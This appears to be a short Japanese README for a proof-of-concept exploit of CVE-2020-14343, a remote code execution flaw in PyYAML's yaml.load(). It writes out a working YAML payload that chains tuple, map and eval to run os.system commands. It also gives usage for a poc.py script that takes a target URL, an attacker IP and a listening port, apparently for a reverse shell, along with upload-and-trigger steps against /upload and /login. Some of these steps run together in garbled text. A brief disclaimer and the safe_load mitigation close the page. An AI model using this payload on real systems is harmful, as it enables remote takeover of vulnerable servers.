
CVE-2020-14343のペイロード
| 項目 | 情報 |
|---|---|
| CVE ID | CVE-2020-14343 |
| 影響を受けるコンポーネント | PyYAML < 5.4 |
| 脆弱性タイプ | 逆シリアル化によるリモートコード実行 (RCE) |
| 深刻度 | 高 |
PyYAML は yaml.load() で信頼できないデータを解析する際、危険な YAML タグ(!!python/object など)を制限していないため、攻撃者は悪意のある YAML コンテンツを構築して任意の Python コードを実行できます。
Payload の核心:
!!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- ["__import__('os').system('command')"]
python poc.py <対象URL> <攻撃者IP> <リスニングポート>
例:
python poc.py http://vulnerable-site.com 192.168.1.100 4444
/upload エンドポイントにアップロードする/login エンドポイントをトリガーして YAML をロード・解析するpip install requests
⚠️ 本ツールはセキュリティ研究および許可を得たテスト専用です!
yaml.load() の代わりに yaml.safe_load() を使用する